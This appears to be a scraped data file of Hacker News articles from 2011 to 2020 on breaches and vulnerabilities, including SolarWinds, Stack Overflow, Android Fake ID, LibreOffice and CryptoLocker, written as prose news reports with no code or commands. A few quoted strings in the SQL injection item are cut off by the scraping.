Another great advantage of the cloud is the networking segmentation between computing and storage. The obvious benefit of this separation is the reduced risk that all data will be compromised, even if a hacker manages to breach all the sophisticated defenses.
Other forms of segmentation include limiting the number of people who can access certain data. Keeping sensitive information in the hands of only those individuals who need it, and staggering access so that the smallest possible number of people have access to the whole is an excellent way to mitigate potential breaches.
Avoiding the Next Capital One Breach
Few companies were as committed to the benefits of cloud computing as Capital One. While this did not protect the company from suffering one of the largest data breaches in history, it may help the next company avoid the same fate.
It has brought greater awareness to the field of cloud security and data protection and identified areas that were exploitable by crafty hackers.
The breach did not prove that the cloud was less secure than previously believed. It showed that it is never a good idea to outsource data security entirely to a third party.
Companies need to remain on guard at all times, take measures to ensure their own part of the data equation remains up to date with the most advanced technology, and keep a watchful eye on their data even when it is stored in the safety of the cloud.
"Hackers Breach Stack Overflow Q&A Site, Some Users' Data Exposed",https://thehackernews.com/2019/05/stack-overflow-databreach.html,"Note: We have updated this story to reflect new information after Stack Overflow changed its original announcement and shared more details on the security incident.
Stack Overflow, one of the largest question and answer site for programmers, revealed today that unknown hackers managed to exploit a bug in its development tier and then almost a week after they gained unauthorized access to its production version.
Founded by Jeff Atwood and Joel Spolsky in 2008, Stack Overflow is the flagship site of the Stack Exchange Network. With 10 million registered users and over 50 million unique visitors every month, Stack Overflow is very popular among professional and enthusiast programmers.
In an older version of the announcement published by Mary Ferguson, VP of Engineering at Stack Overflow, the company confirmed the breach but said it did not find any evidence that hackers accessed customers' accounts or any user data.
However, the updated announcement now says that after sitting quiet for a week, hackers executed privileged web requests, but were able to gain access to a very small portion of data, including IP address, names, and email address—and that for only a small number of users.
""Between May 5 and May 11, the intruder contained their activities to exploration. On May 11, the intruder made a change to our system to grant themselves a privileged access on production. This change was quickly identified and we revoked their access network-wide, began investigating the intrusion, and began taking steps to remediate the intrusion.""
""We can now confirm that our investigation suggests the requests in question affected approximately 250 public network users. Affected users will be notified by us,"" Ferguson said.
The company also revealed hackers exploited a bug that was introduced in a recently deployed built to the development tier for the Stack Overflow website.
Stack Overflow said the company is patching all known vulnerabilities.
""We discovered and investigated the extent of the access and are addressing all known vulnerabilities,"" Ferguson said.
""As part of our security procedures to protect sensitive customer data, we maintain separate infrastructure and networks for clients of our Teams, Business, and Enterprise products and we have found no evidence that those systems or customer data were accessed. Our Advertising and Talent businesses were also not impacted by this intrusion.""
Late last year, another popular question and answer website Quora suffered a massive data breach with hackers gaining access to sensitive information of about 100 million of its users, including their names, email addresses, hashed password, and personal messages.
US Agencies and FireEye Were Hacked Using SolarWinds Software Backdoor,https://thehackernews.com/2020/12/us-agencies-and-fireeye-were-hacked.html,"State-sponsored actors allegedly working for Russia have targeted the US Treasury, the Commerce Department's National Telecommunications and Information Administration (NTIA), and other government agencies to monitor internal email traffic as part of a widespread cyberespionage campaign.
The Washington Post, citing unnamed sources, said the latest attacks were the work of APT29 or Cozy Bear, the same hacking group that's believed to have orchestrated a breach of US-based cybersecurity firm FireEye a few days ago leading to the theft of its Red Team penetration testing tools.
The motive and the full scope of what intelligence was compromised remains unclear, but signs are that adversaries tampered with a software update released by Texas-based IT infrastructure provider SolarWinds earlier this year to infiltrate the systems of government agencies as well as FireEye and mount a highly-sophisticated supply chain attack.
""The compromise of SolarWinds' Orion Network Management Products poses unacceptable risks to the security of federal networks,"" said Brandon Wales, acting director of the US Cybersecurity and Infrastructure Security Agency (CISA), which has released an emergency directive, urging federal civilian agencies to review their networks for suspicious activity and disconnect or power down SolarWinds Orion products immediately.
SolarWinds' networking and security products are used by more than 300,000 customers worldwide, including Fortune 500 companies, government agencies, and education institutions.
It also serves several major US telecommunications companies, all five branches of the US Military, and other prominent government organizations such as the Pentagon, State Department, NASA, National Security Agency (NSA), Postal Service, NOAA, Department of Justice, and the Office of the President of the United States.
An Evasive Campaign to Distribute SUNBURST Backdoor
FireEye, which is tracking the ongoing intrusion campaign under the moniker ""UNC2452,"" said the supply chain attack takes advantage of trojanized SolarWinds Orion business software updates in order to distribute a backdoor called SUNBURST.
""This campaign may have begun as early as Spring 2020 and is currently ongoing,"" FireEye said in a Sunday analysis. ""Post compromise activity following this supply chain compromise has included lateral movement and data theft. The campaign is the work of a highly skilled actor and the operation was conducted with significant operational security.""
This rogue version of SolarWinds Orion plug-in, besides masquerading its network traffic as the Orion Improvement Program (OIP) protocol, is said to communicate via HTTP to remote servers so as to retrieve and execute malicious commands (""Jobs"") that cover the spyware gamut, including those for transferring files, executing files, profiling and rebooting the target system, and disabling system services.
Orion Improvement Program or OIP is chiefly used to collect performance and usage statistics data from SolarWinds users for product improvement purposes.
What's more, the IP addresses used for the campaign were obfuscated by VPN servers located in the same country as the victim to evade detection.
Microsoft also corroborated the findings in a separate analysis, stating the attack (which it calls ""Solorigate"") leveraged the trust associated with SolarWinds software to insert malicious code as part of a larger campaign.
""A malicious software class was included among many other legitimate classes and then signed with a legitimate certificate,"" the Windows maker said. The resulting binary included a backdoor and was then discreetly distributed into targeted organizations.""
SolarWinds Releases Security Advisory
In a security advisory published by SolarWinds, the company said the attack targets versions 2019.4 through 2020.2.1 of the SolarWinds Orion Platform software that was released between March and June 2020, while recommending users to upgrade to Orion Platform release 2020.2.1 HF 1 immediately.
The firm, which is currently investigating the attack in coordination with FireEye and the US Federal Bureau of Investigation, is also expected to release an additional hotfix, 2020.2.1 HF 2, on December 15, which replaces the compromised component and provides several extra security enhancements.
FireEye last week disclosed that it fell victim to a highly sophisticated foreign-government attack that compromised its software tools used to test the defenses of its customers.
Totaling as many as 60 in number, the stolen Red Team tools are a mix of publicly available tools (43%), modified versions of publicly available tools (17%), and those that were developed in-house (40%).
Furthermore, the theft also includes exploit payloads that leverage critical vulnerabilities in Pulse Secure SSL VPN (CVE-2019-11510), Microsoft Active Directory (CVE-2020-1472), Zoho ManageEngine Desktop Central (CVE-2020-10189), and Windows Remote Desktop Services (CVE-2019-0708).
The campaign, ultimately, appears to be a supply chain attack on a global scale, for FireEye said it detected this activity across several entities worldwide, spanning government, consulting, technology, telecom, and extractive firms in North America, Europe, Asia, and the Middle East.
The indicators of compromise (IoCs) and other relevant attack signatures designed to counter SUNBURST can be accessed here.
Researchers Demonstrate Zero-Day Vulnerabilities in Tails Operating System,https://thehackernews.com/2014/07/tails-operating-system-zero-day-vulnerabilities_23.html,"The critical zero-day security flaws, discovered in the privacy and security dedicated Linux-based Tails operating system by the researcher at Exodus Intelligence that could help attackers or law enforcements to de-anonymize anyone's identity, actually lie in the I2P software that's bundled with the Operating System.
Exodus Intelligence has released some details and a video evidence that demonstrate an exploit against the found vulnerability unmasking an anonymous user of the Tails operating system.
The researchers at Exodus claims they can use the vulnerability to upload malicious code to a system running Tails, execute the payload remotely, and de-anonymize the targeted users' public IP address as well.
Tails is a security-focused Debian-based Linux distribution and a suite of applications that can be carried on a USB stick, an SD card or a DVD. It keeps users' communications private by running all connectivity through Tor, the network that routes traffic through various layers of servers and encrypts data.
Meanwhile, Exodus claimed that the privacy-oriented operating system has a number of flaws for which there is no available patches. The company that itself sell zero-day exploits to its clients, including the US agencies and DARPA.
But in this case, Exodus alerted I2P as well as Tails to the problem and said it would not disclose the details to users until the problem has been fixed.
Providing the details about the flaw, the company says that the actual problem lies in the heavily encrypted networking program called the Invisible Internet Project (I2P). The network layer that Tails uses to hide the user's public IP address from other websites and servers in order to keep the user anonymous on the web.
The researchers claims to have found a zero-day vulnerability in the way I2P handles network traffic that can be exploited with the help of a specially configured server.
Even after a user has taken all the steps necessary to disassociate his or her public IP address from the outside world, the flaw could allow an attacker to track down user's identity. But the problem doesn't end here, the worst part is that the de-anonymising is achieved by transferring a payload of code to an I2P user and then executing it remotely to cause a massive damage.
""I2P currently boasts about 30,000 active peers. Since I2P has been bundled with Tails since version 0.7, Tails is by far the most widely adopted I2P usage,"" Exodus explained in a blog post revealing the flaw. ""The I2P vulnerability works on default, fully patched installation of Tails. No settings or configurations need to be changed for the exploit to work.""
The Exodus Intelligence security researchers will released more technical details on the hack once the bug get fixed. Exodus Intelligence is working with the Tails and I2P coders to get the patch soon and after that it won't charge any fees for disclosing the flaw with more bugs.
""We hope to break the mold of unconditional trust in a platform. Users should question the tools they use, they should go even further to understand the underlying mechanisms that interlock to grant them security,"" reads the blog post.
""It's not enough to have faith upon security, rather to have an understanding of it. If the public thinks Exodus is one of a few entities finding bugs in software, they are grossly misinformed.""
So far, the number of affected Tails users is not known. The video demonstration of an attack on a Tails system by Exodus can be found here.
This news revelation must be of great concern to the Invisible.im, an anonymous Instant Messenger (IM) offers secure and anonymous service, which is still in its early stages of development and not yet available for download, is looking forward to use the same I2P anonymity network.
"Android ""Fake ID"" Vulnerability Allows Malware to Impersonate Trusted Apps",https://thehackernews.com/2014/07/android-fake-id-vulnerability-allows_29.html,"Due to the majority in the mobile platform, Google's Android operating system has been a prior target for cybercriminals and a recently exposed weakness in the way the operating system handles certificate validation, left millions of Android devices open to attack.
Researchers at BlueBox security, who identified the vulnerability, dubbed the flaw as Fake ID, which affects all versions of Android operating system from 2.1 (released in 2010) up to Android 4.4, also known as KitKat.
Researchers marked the vulnerability as critical because it could allow a fake and malicious app to masquerade as a legitimate and trusted application, enabling an attacker to perform various actions such as inserting malicious code into a legitimate app, infiltrating your personal information or even take complete control of an affected device. Specifically, devices running the 3LM administration extension are at risk for a complete compromise, which includes devices from HTC to Pantech, Sharp, Sony Ericsson, and Motorola.
""Every Android application has its own unique identity, typically inherited from the corporate developer's identity,"" Bluebox CTO Jeff Forristal wrote in a blog post published Wednesday. The bug, however, will copy the identifies and use them ""for nefarious purposes.""
Researchers named the flaw ""Fake ID"" because it allows malicious applications to pass fake credentials to Android OS, which fails to properly verify the application's cryptographic signature. Instead, the operating system grants all the access permissions to the rogue application that it grants to the legitimate app.
Actually, in order to establish the identity of the app developer, Android applications are signed using digital certificates. But due to the claimed Fake ID vulnerability, the Android app installer doesn't try to authenticate the certificate chain of a given app, which means an attacker can built an app with a fake identity and impersonate it with extensive privileges such as an Adobe plug-in or Google Wallet.
In the case of Adobe, the malware app would look like Adobe-trusted code and have the ability to escape the sandbox and run malicious code inside another app, the researchers said.
""For example, an attacker can create a new digital identity certificate, forge a claim that the identity certificate was issued by Adobe Systems, and sign an application with a certificate chain that contains a malicious identity certificate and the Adobe Systems certificate,"" the Bluebox researchers said in a post explaining their discovery.
""Upon installation, the Android package installer will not verify the claim of the malicious identity certificate, and create a package signature that contains the both certificates. This, in turn, tricks the certificate-checking code in the webview plugin manager (who explicitly checks the chain for the Adobe certificate) and allows the application to be granted the special webview plugin privilege given to Adobe Systems – leading to a sandbox escape and insertion of malicious code, in the form of a webview plugin, into other applications.""
Researchers also pointed out one more target of an attacker exploiting the Fake ID vulnerability i.e. Google's own Wallet payment system. A malicious app with signature of Google Wallet would allow an attacker to access the NFC (Near Field Communications) chip in the device.
The NFC chip in the device is responsible for the storage of payment information used in NFC payments via Google Wallet. This NFC is used in various electronic payment applications and a malicious code can harvest credit card numbers as well.
According to Jeff Forristal, the attackers have more ways to exploit Fake ID vulnerability, a bug that he will discuss in a presentation at Black Hat in Las Vegas next week.
Google already released a patch to its partners in April. However, it still leaves a millions of handsets out there that are still vulnerable, as it's up to the carriers themselves to push the updates to users.
The vulnerability resides in the Android operating system therefore the new update would be available for the users in the coming period, may be today, a month after or could take a year.
As the researchers say, Effectively addressing a vulnerability requires a three step process:
Google produces a generic code fix, which it provides to the Android phone manufacturers
Then phone manufacturers must then incorporate that fix into a firmware update suitable to specific phones, which they provide to carriers
The carrier then distributes the final update, which ensures your phone is safe from the vulnerability As regards Fake ID, Google has provided the generic code fix to the phone manufacturers.
Bluebox Security has also built a Scanner to test for the vulnerability and has a couple of ideas for those who still haven't got the patch.
Bluebox Security is the same company that uncovered the so-called Android ""Master Key"" vulnerability that allowed an attacker to modify any legitimate and digitally signed application in order to transform it into a Trojan program that could then be used to steal device' information or take control of the device.
THN Weekly Roundup — Top 14 Must-Read Cyber Security Stories,https://thehackernews.com/2015/09/hackernews-weekly-updates-1.html,"We found a high concern for cybersecurity tactics and an increased awareness of the challenges that it brings.
This week, we shared lots of stories with our readers, and to help them in identifying the biggest malware threats to their online safety.
We are here with the outline of our last week stories, just in case you missed any of them (ICYMI).
We recommend you read the entire thing (just click 'Read More' because there's some valuable advice in there as well). Here's the list:
➢ How Hackers Can Hack Your Gmail Accounts?
Getting smarter in their phishing tactics, hackers have found out ways to fool Gmail's tight security system by bypassing its two-step verification.
Hackers are now using text messages and phone-based phishing attacks to circumvent Gmail's security and take over your Gmail accounts. — Read more.
➢ Not Just Windows 10, Windows 7 and 8 Also Spy on You
Laughing at controversial data mining and privacy invasion features within Windows 10? Well, Windows 7 and 8 users should laugh no longer as Windows 10 spying is now headed their way too…
Microsoft has been criticized for installing latest updates onto Windows 7 and Windows 8 computers that indiscriminately upload users' data to Microsoft's servers, which might be a significant privacy concern for many users.
To check out and uninstall those creepy updates — Read more.
➢ Top Features Expected in Next iPhone Release
The new iPhones – likely called the iPhone 6S, iPhone 6S Plus or iPhone 7 – will be introduced at Apple's fall event on September 9, and the leaked photos highlighted its key new features:
Force Touch
A Larger FaceTime Camera
4K Video Support
For the detailed explanation of these features — Read more.
➢ Six Teenagers Arrested for Using Lizard Squad's DDoS Tool
Six U.K. teenagers were arrested and then released on bail for using Lizard Squad DDoS attack tool and launching cyber attacks on several websites and online retail services.
Lizard Squad DDoS tool, popularly known as Lizard Stresser, was allegedly used for knocking down the largest online gaming networks – PlayStation Network and Xbox Live – last year — Read more.
➢ 26 Android Phone Models Shipped with Pre-Installed Spyware
The latest report from G Data claimed that more than two dozens of Android smartphones from popular handset manufacturers, including Xiaomi, Huawei, and Lenovo, have pre-installed spyware in the firmware that can not be removed without unlocking the phone.
The spyware, disguised as popular Android apps like Facebook and Google Drive, have the capability of listening in to telephone conversations, accessing the Internet, reading contacts, gallery and location data, installing unwanted apps, and many more.
For more details — Read more.
➢ Weaponized Drones Are Now Legal
After arguments over the Drones law, finally news came out, and the local police of North Dakota in the U.S. became the first state to get an approval of flying weaponized drones. — Read more.
➢ Critical OS X Flaw Grants Mac Keychain Access to Malware
Mac's DYLD_PRINT_TO_FILE flaw got worse.
The privilege-escalation bug that was once used to circumvent security protections and install malware on Mac computers has now been upgraded to infect Mac OS X machines even after Apple fixed the issue last month.
The updated version of the same highly questionable Genieo installer is now accessing user's Mac OS X keychain without user's permission. For more details — Read more.
➢ Popular Baby Monitors Are Hackable
Baby monitors made parents' life a calmed one, as they could see and be with their toddlers while they were away working.
But, recent research showed results where baby monitors from several vendors were at risk of getting breached. US- CERT also alarmed about the flaws in these IoT devices. — Read more.
➢ Government Ruled: FBI to Get Warrant for Spying
The new policy announced Thursday by the US Department of Justice would now force the Federal law agencies to get a legal warrant to spy on cell phone users using ""Stingrays"" or ""IMSI catchers.""
Stingrays, which essentially mimic mobile phone tower, has been used by local police and federal authorities for years to track cell phones in countless investigations without obtaining the court order.
However, now under the new policy, the federal agencies will have to present their annual data revealing how many times they have used stingrays. — Read more.
➢ 'AppLock' Android App is Useless
AppLock is present on almost all the Android phone users, after the report by security researchers which depicts practical examples where you can see that you lived under the belief that the app is acting as promised.
But actually, it is lacking in offering essential security features. — Read more.
➢ Enjoy Faster and More Efficient Browsing Experience with 'Chrome 45.'
Google launched Chrome 45 for Windows, Mac, Linux, and Android last week that solves two major issues Chrome users came across:
Memory Consumption
Battery Consumption
Both the issues have been fixed in Chrome 45. So for your question: How to Fix Chrome Massive Memory Usage?
The Answer is — Simply Try 'Chrome 45'. For full details — Read more.
➢ Apple to Charge Your iPhones and Macbooks for Weeks
Apple is looking to fix the major problem its device users came across — short battery life.
According to a new patent filed by Apple for a 'fuel cell system', the technology giant is working on batteries that could Power its MacBooks and iPhones for days or even weeks without refueling.
Not just this, the new report also revealed that Apple is working closely with British firm Intelligent Energy to deploy a hydrogen fuel cell in iPhone 6 prototype announced this month. — Read more.
➢ Twitter Open Sources 'Diffy' that Automatically Catches Potential Bugs in Code
This came as joy to the software developers, as they can now use Diffy- a comparison based regression analysis tool now open source (that Twitter also uses) to differentiate between the new and the old codes programmer has written and eliminate the bugs in the code. — Read more.
➢ How to Hack Popular Belkin Wi-Fi Routers
This one is a serious issue for you to look upon. As, US-CERT prepared a list of vulnerabilities that tag along with the next generation Belkin routers.
The routers are so vulnerable that several severe cyber attacks like privilege escalation and man-in-the-middle attack are probable to happen.
In the end, the US advisory comes with mitigation procedures that you can follow. — Read more.
One million pages infected by Lilupophilupop SQL injection,https://thehackernews.com/2012/01/one-million-pages-infected-by.html,"One million pages infected by Lilupophilupop SQL injection
ISC (Internet Storm Center) reported that lilupophilupop.com SQL injection attacks. There were about 80 pages infected according to Google searches few weeks back and now it raise to over 1 million . sites being injected with string : "">
Recommended Read : The Hacker News Hacking Awards : Best of Year 2011
Infections are shows on .com, .de, & .uk as the most affected regions. ISC posted stats just to give you a rough idea of where the pages are:
UK - 56,300
NL - 123,000
DE - 49,700
FR - 68,100
DK - 31,000
CN - 505
CA - 16,600
COM - 30,500
RU - 32,000
JP - 23,200
ORG - 2,690
If you want to find out if you have a problem just search for ""
Submitted by ""Andrew Chong"", codename ""Andrew Chong""
Related Post : Iframe Vulnerability in Google App Engine (Appspot)
XSS Vulnerability on AOL Energy website,https://thehackernews.com/2011/11/xss-vulnerability-on-aol-energy-website.html,"XSS Vulnerability on AOL Energy website
A non-persistent Cross Site Scripting (XSS) vulnerability discovered on AOL Energy website. The similar Vulnerability is claimed by few other guys on some forums too. No clue that who found it first, But THN got update from Vansh & Vaibhuv from India.
"Radio Stations Hacked to Play ""F**k Donald Trump"" on Repeat Across the Country",https://thehackernews.com/2017/02/radio-station-trump-hack.html,"It's just two weeks into the Trump presidency, but his decisions have caused utter chaos around the country.
One such order signed by the president was banning both refugees and visa holders from seven Muslim-majority countries (Iraq, Iran, Libya, Yemen, Somalia, Syria, and Sudan) from entering the United States, resulting in unexpectedly arrest of some travelers at airports.
Now, it seems like some anti-Trump protesters have publically declared their fight against the president by exploiting a known flaw in low power FM (LPFM) radio transmitters to play a song the radio stations didn't intend to broadcast.
Radio stations in South Carolina, Indiana, Texas, Tennessee and Kentucky, were hacked recently to broadcast the Bompton-based rapper YG and Nipsey Hussle's anti-Trump song ""Fuck Donald Trump,"" which was already a radio hit in some parts of the country last year, several sources report.
The song was repeatedly played on Monday night, according to the RadioInsight, and the news of the incident began emerging shortly after Trump's inauguration on January 20, eight days before hackers hacked 70 percent of the police CCTV cameras in Washington DC.
Hackers gained access to the radio stations by exploiting known vulnerabilities in Barix Exstreamer devices which can decode audio file formats and send them along for LPFM transmission.
Over a dozen radio stations experienced the hack in recent weeks, though some of them shut down their airwaves as quickly as possible in an attempt to avoid playing the inflammatory ""FDT (Fuck Donald Trump)"" song on loop.
The hackers or group of hackers behind the cyber attack is still unknown. The affected stations so far include:
105.9 WFBS-LP Salem, S.C.
Radio 810 WMGC/96.7 W244CW Murfreesboro TN
101.9 Pirate Seattle
100.9 WCHQ-LP Louisville
100.5 KCGF-LP San Angelo TX
However, there are unconfirmed reports from radio stations in California, Indiana, and Washington State that are believed to be affected as well.
Has any of the radio stations you listen to been hit by the hackers? Let us know in the comments!
Bitcoin Cloud Mining Service Hacked; Database On Sale for Just 1 Bitcoin,https://thehackernews.com/2015/07/bitcoin-mining-server.html,"Bitcoin Cloud Mining service Cloudminr.io has been hacked and its whole users database is on sale for 1 Bitcoin.
The unknown hackers have successfully taken full control of the website's server and defaced the homepage of the website.
Users visiting the website are greeted with a defaced homepage showing the partial database of around 1000 clients including their usernames and unencrypted passwords in completely plain text format.
This clearly indicates that the company is not following the best security practices to secure their users private data as the passwords were not even hashed before storing into the database.
Hackers offering around 80,000 users database for 1BTC
The database of 1000 users shown on the website homepage is just a sample given by the hackers while they have compromised around 80,000 users database in total from the cloud mining service.
The hackers are offering the entire database of thousands of users for the just 1BTC, which could be a goldmine for cyber-criminals and spammers.
So far, there is not any details on whether Bitcoin wallets or simply parts of the website server were compromised.
However, users of Cloudminr.io are recommended to change their passwords at any other service that uses the same combination of username and password as their Cloudminr account.
"SandroRAT — Android Malware that Disguises itself as ""Kaspersky Mobile Security"" App",https://thehackernews.com/2014/08/sandrorat-android-malware-that.html,"Researchers have warned users of Android devices to avoid app downloads from particularly unauthorized sources, since a new and sophisticated piece of malware is targeting Android users through phishing emails.
The malware, dubbed SandroRAT, is currently being used by cybercriminals to target Android users in Poland via a widely spread email spam campaign that delivers a new variant of an Android remote access tool (RAT).
The emails masquerade itself as a bank alert that warns users of the malware infection in their mobile device and offers a fake mobile security solution in order to get rid of the malware infection.
The mobile security solution poses as a Kaspersky Mobile Security, but in real, it is a version of SandroRAT, a remote access tool devised for Android devices, whose source code has been put on sale on underground Hack Forums since December last year.
A mobile malware researcher at McAfee, Carlos Castillo, detailed the new variant of Android remote access trojan over the weekend in a blog post. According to the researcher, the package spread via phishing campaign is capable of executing several malicious commands on the infected devices.
SandroRAT gives the attacker an unrestricted access to sensitive details such as SMS messages, contact lists, call logs, browser history (including banking credentials), and GPS location data stored in Android devices and store all the data in an ""adaptive multi-rate file on the SD card"" to later upload them to a remote command and control (C&C) server.
""Spam campaigns (via SMS or email) are becoming a very popular way to distribute Android malware, which can steal personal information or even obtain complete control of a device with a tools like SandroRat,"" wrote Carlos Castillo. ""This attack gains credence with the appearance of a bank offering security solutions against banking malware, a typical behavior of legitimate banks.""
This new version of SandroRAT also has a self-update feature in it and it can install additional malware through user prompts for such actions. The malware gives the attacker full control over the messages, who can intercept, block and steal incoming messages, as well as insert and delete them.
It also appears that the attacker can send multimedia messages with specific parameters sent by the C&C server and can also record nearby sounds using the device's mic.
Castillo also notes that the SandroRAT variant of malware had decryption capabilities for older releases of Whatsapp messaging app. But, the users running the latest version of Whatsapp in their Android devices are not vulnerable because the developers adopted a stronger encryption scheme.
""This decryption routine will not work with WhatsApp chats encrypted by the latest version of the application because the encryption scheme (crypt7) has been updated to make it stronger (using a unique server salt),"" Castillo explained. ""WhatsApp users should update the app to the latest version,"" he advised.
Users are advised to avoid application downloads from unauthorized sources, particularly when the app download link is send through an email. Good practice is to always prefer downloading apps from the Google Play Store or other trusted sources. Stay Safe! Stay Tuned!
"""4chan Hacked"", Most Popular Image-Bulletin Board Compromised",https://thehackernews.com/2014/04/4chan-Hacked-Image-Bulletin-Board.html,"The founder of 4chan, Christopher Poole, aka ""moot"" has confirmed few hours ago, in a blog post that the popular image-based bulletin board was hacked.
The attacker gained access to the administrative functions and successfully hacked into one of 4chan's database by exploiting a website's software vulnerability last week. The motive behind the hack was to expose the posting habits of a specific user the attacker didn't like, moot wrote.
It is believed that the software vulnerability allowed the attacker to hack into only the image-board moderation panels, and some tables in the 4chan back-end database. According to the blog post, the way hacker extracted the information from its database, 4chan knows the ""detailed logs of what was accessed"", which indicate that the ""primarily moderator account names"" and their ""credentials"" were targeted and compromised by the hacker.
""Due to the way the intruder extracted information from the database, we have detailed logs of what was accessed. The logs indicate that primarily moderator account names and credentials were targeted,"" reads the blog post.
The hacker was able to access the Pass credentials of three 4chan Pass (paid account without CAPTCHAs system) users, who have been notified by the company shortly after the discovery of the attack and offered refunds along with the lifetime Passes.
The founder of the 4chan assured its users that their financial information has not been compromised in the attack as 4chan doesn't process any payment information and all the payment information is ""processed securely"" by the Stripe.
After 4chan aware of this software vulnerability exploited by the hacker, it was patched quickly and 4chan assured its users that they continue to review its software and systems to prevent future attacks and breaches.
A week ago, Moderators of Social-sharing website Reddit were under attack after being accused of censoring posted links containing words like ""National Security Agency,"" ""Edward Snowden"" and even ""Bitcoin"" on the website's subreddit r/technology.
The Reddit moderators have lost their focus of what they were there to do. Their job is to moderate effectively, but this secret censorship is a ""disaster"" as it lost the transparency between the user and the service.
4chan apologized for the inconvenience caused to its users, but this is not first time hacker targeted 4chan. Back in June 2012, the hacker UGNazi changed the DNS for 4chan and redirected its visitors to UGNazis Twitter account.
Just Opening A Document in LibreOffice Can Hack Your Computer (Unpatched),https://thehackernews.com/2019/07/libreoffice-vulnerability.html,"Are you using LibreOffice?
You should be extra careful about what document files you open using the LibreOffice software over the next few days.
That's because LibreOffice contains a severe unpatched code execution vulnerability that could sneak malware into your system as soon as you open a maliciously-crafted document file.
LibreOffice is one of the most popular and open source alternatives to Microsoft Office suite and is available for Windows, Linux and macOS systems.
Earlier this month, LibreOffice released the latest version 6.2.5 of its software that addresses two severe vulnerabilities (CVE-2019-9848 and CVE-2019-9849), but the patch for the former has now been bypassed, security researcher Alex Inführ claims.
Though Inführ has not yet disclosed details of the technique that allowed him to bypass the patch, the impact of this vulnerability remains the same, as explained below.
1.) CVE-2019-9848: This vulnerability, which still exists in the latest version, resides in LibreLogo, a programmable turtle vector graphics script that ships by default with LibreOffice.
LibreLogo allows users to specify pre-installed scripts in a document that can be executed on various events such as mouse-over.
Discovered by Nils Emmerich, the flaw could allow an attacker to craft a malicious document that can silently execute arbitrary python commands without displaying any warning to a targeted user.
""The big problem here is that the code is not translated well and just supplying python code as the script code often results in the same code after translation,"" Emmerich said.
""Using forms and OnFocus event, it is even possible to get code execution when the document is opened, without the need for a mouse-over event.""
Emmerich also released a proof-of-concept for this attack on his blog post.
2.) CVE-2019-9849: This vulnerability, which you can fix by installing the latest available update, could allow the inclusion of remote arbitrary content within a document even when 'stealth mode' is enabled.
The stealth mode is not enabled by default, but users can activate it to instruct documents retrieve remote resources only from trusted locations.
How to Protect Your System
Inführ has already notified LibreOffice team of the bypass issue, but until the team releases a patch to fix the bypass, users are recommended to update or reinstall the software without macros or at least without LibreLogo component, by following the below-mentioned steps.
Open the setup to start the installation
Select ""Custom"" installation
Expand ""Optional Components""
Click on ""LibreLogo"" and select ""This Feature Will Not Be Available""
Click Next and then Install the software
Hacker 'Pinkie Pie' successfully compromised Chrome on Nexus 4 and Samsung Galaxy S4,https://thehackernews.com/2013/11/pinkie-pie-successfully-compromised.html,"A Mysterious Hacker who goes by the ""Pinkie Pie"" handle is rewarded with $50,000 USD for hacking into the Google Chrome browser for Nexus 4 and Samsung Galaxy S4.
At Information Security Conference PacSec 2013 in Tokyo, during the HP's Pwn2Own contest, a zero-day exploit showcased by ""Pinkie Pie"", that took advantage of two vulnerabilities:
An integer overflow that affects Chrome.
Chrome vulnerability that resulted in a full sandbox escape.
For successful exploitation, you have to get your victim to visit a malicious website e.g. clicking a link in an email, or an SMS or on another web page. He demonstrated this zero-day attack with remote code execution vulnerability on the affected devices.
It is not known whether other Android phones are also vulnerable to same flaw or not. Vulnerability has been disclosed to Google by the Contest organizers and the company is working to address the issue as soon as possible.
Researchers from Japan has also found a second exploit for the Samsung Galaxy S4, for which they are rewarded with $40,000 yesterday.
Stay tuned to +The Hacker News 's Facebook Page and Twitter Account for more updates!
US police department pays $750 Ransom to retrieve their files from CryptoLocker Malware,https://thehackernews.com/2013/11/us-police-department-pays-750-ransom-to.html,"The CryptoLocker Malware continues to spread, infected more than 12,000 U.S computers in one week and threatening millions of computers in the UK.
Just last week, The UK National Crime Agency urge people afflicted by CryptoLocker not to pay ransom, not least because there is no guarantee that they will even receive an unlock key.
Not even Police departments are immune to CryptoLocker. In November second week, Massachusetts' Swansea Police Department paid a 2 Bitcoin ($750 that time) ransom to decrypt images and Word documents encrypted by CryptoLocker ransomware.
""It gave us 100 hours to pay and it was literally a timer,"" said Police Department. ""A big red screen comes up with a timer that says you have 100 hours to pay or your files will be encrypted forever.""
Malware usually distributed through spam emails, encrypting the user's files on the infected machine and also the local network it is attached to. However, Police Department said the virus did not affect the software that the police use in reports or booking.
Security experts also commented that ""The only reason this type of attack success is because people are willing to pay up. If no one ever paid, there would be no ransomware."" But will they also not pay ransom for their very important files, if encrypted by malware ? Definitely everyone will, as the Police have to. Other attackers are also moving in this direction as well.
There are many other ways, following that you can protect your system from CryptoLocker before infection. Ensure you have best one active and up-to-date and if a computer becomes infected it should immediately be disconnected from any networks.
Read more detailed articles on Cryptolocker Ransomware:
Cryptolocker Ransomware makes different Bitcoin wallet for each victim
CryptoLocker Ransomware demands $300 or Two Bitcoins to decrypt your files
CryptoLocker developer launches Decryption Service website; 10 Bitcoins for Decryption Keys
Hacker Steals $8.4 Million in Ethereum (4th Heist In A Month),https://thehackernews.com/2017/07/ethereum-hack.html,"More Ethereum Stolen!
An unknown hacker has just stolen nearly $8.4 Million worth of Ethereum – one of the most popular and increasingly valuable cryptocurrencies – in yet another Ethereum hack that hit Veritaseum's Initial Coin Offering (ICO).
This incident marks as the fourth Ethereum hack this month and second cyber attack on an ICO, following a theft of $7 Million worth of Ether tokens during the hack of Israeli startup CoinDash's initial coin offering last week.
A few days ago, a hacker also stole nearly $32 Million worth of Ethereum from wallet accounts by exploiting a critical vulnerability in Parity's Ethereum Wallet software, which followed a $1 Million worth of Ether and Bitcoins heist in crypto currency exchange Bithumb earlier this month.
Now, Veritaseum has confirmed that a hacker stole $8.4 Million in Ether (ETH) from its ICO this Sunday, July 23.
""We were hacked, possibly by a group. The hack seemed to be very sophisticated, but there's at least one corporate partner that may have dropped the ball and be liable. We will let the lawyers sort that out if it goes that far,"" Veritaseum founder Reggie Middleton confirmed the theft on the BitcoinTalk forum.
Middleton has called the recent Ethereum hack ""inconsequential,"" saying some of his partners (unnamed corporate third party services) may be responsible for the attack.
Middleton said that due to the high demand of the VERI tokens during the ICO held over the weekend, the hacker first managed to steal those tokens and then immediately sold them to other buyers ""within a few hours"" for the cryptocurrency.
The hacker made off an estimated $8.4 million in ETH during that a relatively short period of time. The stolen funds were first dumped into two separate Ethereum wallets and then were moved to other accounts.
It looks like around 37,000 VERI tokens were stolen out of 100 Million in the recent theft, though the good news is that the Ethereum theft does not affect actual ICO investors, as Middleton says the stolen tokens belonged to him and his team members.
